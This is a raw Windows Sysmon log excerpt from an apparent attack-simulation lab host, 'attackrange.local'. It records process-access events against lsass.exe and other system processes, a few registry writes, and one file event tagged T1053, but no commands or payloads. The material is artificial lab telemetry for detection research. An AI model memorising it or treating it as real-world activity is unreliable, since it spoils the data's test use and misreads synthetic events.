13:09:29.010{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.010{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.010{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.010{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.010{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4289-6000-1800-000000009A01}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.010{08A6967A-4288-6000-1000-000000009A01}11362036C:\Windows\system32\svchost.exe{08A6967A-4289-6000-1800-000000009A01}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.994{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.994{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.994{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.994{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.994{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.994{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.994{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.994{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.994{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.994{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.994{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.994{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x8000000000000000968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.978{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.978{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.978{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.963{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.963{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.963{08A6967A-4288-6000-1000-000000009A01}11361996C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.947{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.947{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.947{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT10532021-01-14 13:09:28.916{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exeC:\Windows\Tasks\SA.DAT2016-09-12 11:34:03.403 13241300x8000000000000000958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.885{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000001) 10341000x8000000000000000957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.619{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1300-000000009A01}1256C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 